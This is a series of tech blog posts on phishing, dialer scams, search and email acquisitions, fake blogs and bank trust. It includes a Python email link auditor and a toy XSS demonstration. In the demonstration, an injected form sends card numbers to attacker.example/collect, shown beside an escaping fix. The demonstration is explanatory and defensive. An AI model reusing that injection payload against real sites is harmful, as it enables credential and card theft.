Phishing Airmiles?

As long as people think of phishing as just stealing financial data, no one’s safe. Take this email I just received from Virgin Atlantic after signing up for their Flying Club frequent flier program. It’s a great example of how a user could be duped into giving up personal information (which may, but need not, include financial data) via a socially engineered email.

The email itself is from “flying club <megasaver@fly.virgin.e-rm.co.uk>” which could itself be phishy. Then there’s the text, which begins:

If you would like to view an enhanced version of this email in your web browser, complete with illustrations, please go to: http://s1.e-srv.net:80/?s2=01-4-4COWkFQip_l5uKze-5813

———————————————————————-
INSIDER
———————————————————————-

Dear Mr xxxx,

Start spending time on life… Have you seen our fantastic new look website? Not only does it look good, but the features on the site are great too. As a flying club member, you can now deal with almost all of your flying needs quickly and easily by clicking below: http://s1.e-srv.net:80/?s2=01-4-4COWkFQip_lhG0N2-5045

Now those links work (I’ve removed some digits for security’s sake here), but there’s nothing in there that tells me it’s not a phish: neither the sender’s address nor the links point at anything recognisably Virgin Atlantic’s own. It’s not hard to imagine a phisher sending out an email identical to this and luring the victim into giving up account details, at least enough for the phisher to then impersonate the customer and make flight bookings, alter bookings, steal airmiles or even access other data using that information.

We’ve said it before: phishing bank accounts is just the beginning. Companies going online: wise up and, as far as possible, use links that users can verify visually, under a domain they already know is yours.
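Here is the check I wish mail clients did for me, written up as an added example (not code from Virgin Atlantic or from its mailing house). It parses an email, works out which domain the sender and every link really belong to, and flags anything that does not match the domain the message claims to come from. The sample message is reconstructed from the email quoted above; the brand domain virgin-atlantic.com and the short list of two-level suffixes are assumptions for the example.

```python
import re
from email import message_from_string
from urllib.parse import urlparse

# Suffixes under which the registrable name needs three labels (e-rm.co.uk, not
# co.uk). A partial list assumed for illustration; a real check would consult
# the Public Suffix List.
MULTI_LABEL_SUFFIXES = {"co.uk", "org.uk", "ac.uk", "com.au", "co.jp"}

# Matches http/https links in plain-text mail bodies.
URL_RE = re.compile(r"""https?://[^\s<>"']+""")


def registrable_domain(host: str) -> str:
    """Return the part of a host name a person would recognise as 'the site':
    fly.virgin.e-rm.co.uk -> e-rm.co.uk, s1.e-srv.net -> e-srv.net."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def audit_links(raw_email: str, expected_domain: str) -> dict:
    """Compare the From: address and every link in the body against the domain
    the sender claims to represent. Returns the sender's registrable domain,
    every (url, registrable_domain) pair found, and the pairs that do not
    belong to expected_domain."""
    expected = expected_domain.lower()
    msg = message_from_string(raw_email)
    sender = msg.get("From", "")
    m = re.search(r"@([A-Za-z0-9.-]+)", sender)
    sender_domain = registrable_domain(m.group(1)) if m else ""
    body = msg.get_payload()  # single-part text message in this example
    links = []
    for url in URL_RE.findall(body):
        host = urlparse(url).hostname or ""
        links.append((url, registrable_domain(host)))
    suspicious = [(url, dom) for url, dom in links if dom != expected]
    return {
        "sender_domain": sender_domain,
        "sender_matches": sender_domain == expected,
        "links": links,
        "suspicious": suspicious,
    }


# Constructed sample, reproducing the sender and links of the message above.
SAMPLE_EMAIL = """From: flying club <megasaver@fly.virgin.e-rm.co.uk>
To: member@example.com
Subject: INSIDER

If you would like to view an enhanced version of this email in your web browser,
please go to: http://s1.e-srv.net:80/?s2=01-4-4COWkFQip_l5uKze-5813

As a flying club member, you can now deal with almost all of your flying needs
by clicking below: http://s1.e-srv.net:80/?s2=01-4-4COWkFQip_lhG0N2-5045
"""


if __name__ == "__main__":
    # virgin-atlantic.com is the assumed brand domain for this example.
    report = audit_links(SAMPLE_EMAIL, "virgin-atlantic.com")
    print("sender domain:", report["sender_domain"],
          "(matches brand)" if report["sender_matches"] else "(does NOT match brand)")
    for url, dom in report["suspicious"]:
        print("link off-brand:", dom, "<-", url)
```

Run against the sample, every link resolves to e-srv.net and the sender to e-rm.co.uk, so both get flagged; a message whose sender and links all sit under the brand's own domain comes back with an empty suspicious list. The check says nothing about whether e-srv.net is a legitimate mailing contractor; that is exactly the point, since the recipient cannot tell either.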

Sad News For The Review

Sad news: As of today, the Far Eastern Economic Review, primary home to the Loose Wire column for the past few years, has ceased publishing as a weekly magazine. That means that the column will move elsewhere, although WSJ.com readers will continue to be able to read it online. For FEER and other readers, please do drop me an email if you’d like to be kept informed of the column’s new home once I’ve decided where it’s going to be.

Loose Wire blog will continue as usual.

How To Phish Google

I’ve long believed that phishing emails are just the beginning of a new kind of fraud which is likely to be sophisticated and fast moving. Here’s an example of what they might look like, courtesy of a British computer scientist called Jim Ley, written up at the security website Netcraft. Ley, Netcraft says, “has demonstrated that opportunities exist for fraudsters to launch phishing attacks using cross site scripting bugs on the very widely used Google sites.”

I’m not quite clear from either account whether this is one vulnerability or more, and whether it applies only since Google extended their desktop search to include files on your computer (rather than on the Internet).

As far as I can figure it out, it works like this. A bad guy, rather than try to lure a victim to his own dodgy website using a socially engineered email or a virus, would use the cross site scripting bug to ‘inject’ his content into a genuine Google page, so that it shows up at a Google address the victim already trusts. So, say, a user would visit Google and find a credit card submission form which explains that Google is soon to become a subscription-only service at $5 per month, but that users could take advantage of an earlybird special offer to obtain lifetime free searches for just $10. (This is Ley’s example, cited by Netcraft.)
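To make the mechanism concrete, here is an added example (not code from Netcraft, Ley or Google) of the kind of bug involved: a toy search page that echoes the search term straight into its HTML, beside the same page with the term escaped. The host search.example.com, the parameter name q and the collector address attacker.example are all assumed for the example; the injected “offer” follows Ley’s $10-for-lifetime-searches scenario.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# The trusted site's results page, with one slot for the search term.
PAGE = "<html><body><h1>Results for: {q}</h1><p>No results.</p></body></html>"


def render_results_vulnerable(query: str) -> str:
    """Reflected cross-site scripting: the term goes into the page untouched,
    so markup in the link's query string becomes part of the site's own HTML."""
    return PAGE.format(q=query)


def render_results_fixed(query: str) -> str:
    """Same page, but the term is HTML-escaped before it is inserted, so a
    '<form ...>' in the query is displayed as text rather than rendered."""
    return PAGE.format(q=html.escape(query, quote=True))


def query_from_url(url: str) -> str:
    """Extract the search term from a results link, as the server would."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


# Constructed attacker link. The victim sees a link to the trusted search host;
# the "search term" is really a credit-card form posting to the attacker.
INJECTED_FORM = (
    '<form action="http://attacker.example/collect" method="post">'
    "Searches will cost $5 per month from next month. Early-bird offer: "
    "lifetime free searches for $10. Card number: "
    '<input name="cc"><input type="submit" value="Pay $10"></form>'
)
ATTACK_LINK = "http://search.example.com/results?q=" + quote(INJECTED_FORM)


def contains_injected_form(page_html: str) -> bool:
    """True if the attacker's form would actually render in the page."""
    return "<form" in page_html and "attacker.example/collect" in page_html


if __name__ == "__main__":
    term = query_from_url(ATTACK_LINK)
    print("vulnerable page renders attacker form:",
          contains_injected_form(render_results_vulnerable(term)))
    print("fixed page renders attacker form:",
          contains_injected_form(render_results_fixed(term)))
```

The point the example makes is that in the vulnerable case the address bar, the certificate and the site’s own look and feel are all genuine; only the echoed search term is the attacker’s. Escaping every untrusted value at the point it is written into HTML is what closes that hole, and it has to be done on every page that reflects input, which is why partial fixes of the kind Netcraft and Ley describe leave the problem open.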

Another vulnerability, in the Google Desktop, would, Netcraft says, have “allowed an attacker to search a user’s local machine for passwords and report the results directly back to the attacker’s own web site.” Both vulnerabilities have been fixed, but only incompletely, Netcraft and Ley say.

I don’t claim to understand the technical aspects of this, and it may be somewhat obscure. But what is worrying is that (a) Ley reports Google as being less than interested in addressing the issues he raised (two years ago, according to his website) and, (b) that if such tricks are occurring to diligent folk like Ley, they must be occurring to hackers and the Internet underground. I’ve said it before, and I’ll say it again: Phishing is not just misleading emails, it’s a multifaceted effort to part us ordinary folk from our online money. And it’s not going to go away. Indeed, like most things technological, it’s a fast escalating arms race, and I don’t think we’ve even started to get it figured out.

Dialer Scams And Heads In The Sand

I can’t help feeling that telephone companies and Internet Service Providers are in real danger of legal action if they don’t tackle the problem of modem dialing.

This NBC5 story from Chicago quotes a local woman as complaining about a series of weird calls to her phone company, SBC. The answer: “They didn’t know too much about it. They said, ‘Well, you might want to check with your Internet provider,’” the customer recalled. Her ISP, AOL, wasn’t any more helpful. “The person said basically there was nothing they could do; these charges were not coming from them, therefore, they can’t credit us, they can’t help us,” the customer said.

Phone companies and, to a lesser extent, ISPs, can’t stick their heads in the sand on this. They mustn’t palm off customers with stupid answers, and they must investigate themselves the companies behind these scams. If they don’t, class action suits are bound to follow.

Yahoo! Buys Bloomba

Yahoo! has bought Stata Labs, the guys behind Bloomba, an excellent email program that is more of a database.

In a statement the company said they “intend to continue supporting Stata Labs’ existing customers for one year from the date of product purchase”. They said that while there is no word on what Yahoo! will do with Bloomba, there will be no more sales of the program, and folks who bought Bloomba within the last thirty days are eligible for a full refund.

As Reuters points out in a story on the purchase, Microsoft recently bought Lookout, a plugin that allows users to better search Outlook. Given that Bloomba has been described (pre-Gmail) as the Google of email, you might get an idea where this is all going. The big game in town seems to be to offer some sort of product that allows folk to get a better grip on searching their emails, contacts, what-have-you. Bloomba did a pretty good job of that.

And don’t forget that Yahoo! bought OddPost a few months back. OddPost wraps email, RSS and other stuff into a kind of web-based email program. Neat stuff, although since Yahoo! bought it I’ve not heard anything more of it. It would be sad to see all this great stuff somehow get lost. And since I’ve recommended both products to readers in the past, should I and others be more wary about raving about stuff that gets sold off and subsequently disappears?

Portable Media Centers: Damp Squibs?

How big are Portable Media Centers going to be?

Not very, says The Diffusion Group, a Dallas-based research consultancy. In a report it says both Microsoft-based and non-MS-based media players with video, audio and photo capabilities will “face stiff competition from less-expensive application-specific alternatives such as MP3 players, portable DVD players, and new portable photo storage technologies”.

Partly it’s price: “while PMCs offer consumers an ‘all-in-one’ package, its $500 price tag will make single application devices much more attractive to consumers,” Diffusion says. The other limitation is: Do people really want all this stuff? Given the main attraction of a PMC is storing and playing back video, and given that most folk still don’t use handheld video recorders (I’m guessing PVR here means portable or personal video recorders) as much as expected, “demand for a portable PVR is likely to remain very low for the next several years.” Then, says Diffusion, there are alternatives: Portable TVs are cheap, and the more fancy high end stuff, like Sony’s new LF-X5 with its live digital TV viewing with integrated Wi-Fi connectivity and a 7-inch viewing screen, are going to get cheaper.

I respectfully disagree. I don’t think everyone who has an iPod is going to get a PMC. But you only need to sit on a Virgin Atlantic flight and watch people tap into their fully independent video-on-demand (select programs, stop and start, fast forward and rewind) screens to see the power of portable video. Just because people aren’t using their PVRs as much as we expected, doesn’t mean they don’t want to watch video everywhere they go. And while personal TVs may satisfy some of this market, what is that compared to being able to store a few episodes of Seinfeld to watch on the train to work? If we’ve learned nothing else from MP3 players, we’ve realised that people want to design and personalise their portable entertainment. If not, everyone would still be carrying around portable radios. As prices drop — even Diffusion anticipates that the price of portable media centers will decline by more than 50% to below $250 in a couple of years — I think there’ll be more and more people packing these things.

Even Mayors Get Dialer Scammed

It’s not just small fry getting hooked in the great modem hijacking/dialer scam.

The Derrick, a publication from Pennsylvania’s Oil City, reports the town’s former mayor has become embroiled, demanding Verizon forgive $1,200 in charges. Verizon has so far refused to forgive Malachy McMahon’s debt.

McMahon is going after Verizon, who he sees as complicit in the scam: “For a corporation to condone and profit from this is beyond me, in the case of Verizon,” the publication quoted McMahon as saying. “It’s illegal activity. They’re after phone usage. It’s big-time money when they go overseas.” Local prosecutors are looking into this and other cases.

Part of the problem is that the billing is not just to the telco. Another company, National One Telecom, claims he owes $76 for calls. National One seems to make its money from charging an “entertainment fee” for accessing certain websites, which are not named on the bills. Some of the fee goes to the telco, some to National One. This is how National One Telecom describes itself:

National One Telecom, Inc.’s mission is to provide billing solutions for clients with audiotext services, videotext services, long distance services, and other telecommunications services.

Our goal is to seamlessly merge Internet technologies with technologies seen in traditional telephone networks. Together with our clients we create a bridge between the two allowing for better ecommerce and telephone access to a wide national audience.

In addition to this, we are committed to helping our customers understand these new billing solutions and are willing to walk them through step by step in case they have any questions or problems. Thank you for your business.

Hmm. The most amusing bit of the Derrick story is this end quote from a Verizon spokesman: Modem hijacking, while “an industry-wide problem, is not really a telephone-company issue per se. It’s really an Internet issue.” Sure. Telcos, watch out.

Yahoo! Goes Outside For Searches

Maybe it’s just Yahoo! trying out the competition, but a press release from Tucson, AZ-based Webglimpse.net, maintainers of the Glimpse search engine, says that Yahoo! has “purchased several licenses” of its software for internal use. Glimpse is a C program for fast searching of large numbers of text files on Unix systems. It is at the core of Webglimpse, a website search engine.

WebGlimpse’s Golda Velez says: “As I understand it this will be used by Yahoo! and Overture developers as a tool to search local datasets, possibly a large code base.” Why isn’t Yahoo using its own software for this kind of thing?

Faux Blogs And The Art Of The Dupe

Are fake blogs savvy marketing tools or the thin end of a wedge that will undermine the credibility of all blogs?

Dennis Nishi has a piece in Sunday’s Chicago Tribune about fake blogs or faux blogs, a topic I’ve blazed off about before.

He points to Beta-7, a fake blog conceived, if that’s the right word, by the New York office of Portland, Ore.-based advertising agency Wieden & Kennedy. “The blog was intended to create a buzz for Sega’s ‘ESPN NFL Football 2K4’ game and draw attention away from Electronic Arts’ ‘Madden Football 2004’–the game that dominates the segment,” Nishi writes. “The Beta-7 blog and two others featured pictures of injuries suffered by gamers during blackouts, and bulletin-board messages were posted across the Internet about the adverse side effects of playing. Confidential company memos–purportedly acquired by another game tester–were posted that portrayed Sega as increasingly worried about the problems.” The whole thing was basically a scam: “Beta-7 ran for four months and ended with the September release of the game. The beginning and end of the campaign were scripted ahead of time, but everything in between was created on the fly and in response to how the audience reacted.”

Of course, we can get all snotty about this. But the bottom line is that the site attracted 2.2 million visitors, and sales improved over last year by 20 percent, selling about 360,000 games. It was certainly more successful than Dr Pepper/7 Up Inc.’s Raging Cow, a flavored-milk drink targeted at teens and young adults. Nishi writes that when legitimate bloggers discovered that company-sponsored shills were recruited to post comments to blogs, some bloggers responded by creating a Web site to boycott Raging Cow. “The boycott is going a year later.” Warner Bros also got sliced when editors of blogs traced suspiciously positive comments about a band Warner Bros.

To me the whole thing is silly and misleading. Blogging is a new medium and doesn’t need this kind of Trojan Horse pretence. But I guess there’s also an argument that if users are dumb enough — or wise but willing to be entertained — then it doesn’t really matter. Hell, what passes for news on TV these days is more often than not just dressed-up reality TV. I guess I’d hoped blogging would remain a raw, honest medium for a while longer, and that a keen and clear understanding of the blogger’s background and motives would be the first thing readers would look for.

Phishing Takes Its Toll

Is phishing beginning to take its toll on banks?

It’s been my belief for some time that this is, or would be, the case. Banks have seen the Internet as a cash cow and have been over-eager to milk it without realising that it’s not just a way to grab more customers and slice overheads. The Internet is a world unto itself, with its own rules, its own technologies — and its own scams. Banks and the Internet make sense, but not if banks think that an online department can be set up in a few weeks and staffed by a few sysops.

That’s why phishing is such an important wake-up call. It’s the first seriously clever scam that online banking has faced, and banks, and other institutions, have done a very poor job in responding to it. Sure, they’re beginning to now, but not before anything between $500 million and $5 billion has been lost to phishers. Whatever the figure, some folk made some serious money out of phishing, which means that Internet-based financial crime is going to be the main attraction for every criminal with half a brain from here to Archangel.

Which is where a new survey, reported by this month’s American Banker magazine (subscription only), comes in.

The article says that “nearly 30% of respondents to the 2004 American Banker/Gallup Consumer Survey said they think a bank has violated their financial privacy. That is the highest level since the question was first asked in 2001 and “a statistic you want to pay attention to,” said John J. Byrne, director of the American Bankers Association’s Center for Regulatory Compliance”. The article goes on to say: “A possible explanation for the increased perception among consumers that banks have violated their privacy may be the rising incidence of sophisticated identity-theft operations such as “phishing,” say experts.”

Of course, banks are going to say it’s not their fault: “Peter Cassidy, secretary general of the group, said that it is common for victims of phishing attacks to blame their financial institution for the loss of their personal information, despite the fact that the company had no involvement in the scam.” Of course banks are involved, in the sense that they did not heed the problem when it first appeared more than a year ago, but let’s not dwell on that. The bigger problem, the magazine says, is maintaining customer trust. “Dollar-for-dollar, the loss of customers’ trust that a bank is a safe place to put their money is a potentially bigger deal than all of the money people have lost to phishing attacks so far,” Mr. Cassidy said.

While the article swings between two ideas of privacy (releasing information to third parties for marketing purposes, and “why did you let someone steal all my money from my account?”), to me the problem is pretty much the same. Any institution that plays fast and loose with your data is going to score low with the customer, whether it does so by letting third parties email you trying to sell you stuff or by treating its online service as just another way to flog more services. Two banks I deal with try this. One has lots of rubbish on its logout page that confuses the user who is looking for certainty they’ve logged out (admittedly better than a few months ago, when it showed a message along the lines of ‘you’ve logged out but you haven’t logged off’ alongside a picture of a palm tree and an offer of travel insurance). The other forces me to sit through an ad for special-interest deposit accounts while I call its helpline via an IDD call. “Is my bank spending time protecting my assets or trying to sell me more snake oil?” would be a reasonable question to ask in the face of this marketing onslaught.

I think banks are going to lose customers if they can’t figure out ways to make online banking more secure. And it’s not just about educating users, although that’s part of it. It’s really listening hard to people who know about some of the scams — and vulnerabilities that lead to scams — out there, and then trying to pre-empt them. In the end it’s about making a technology that is as bulletproof as you can make it.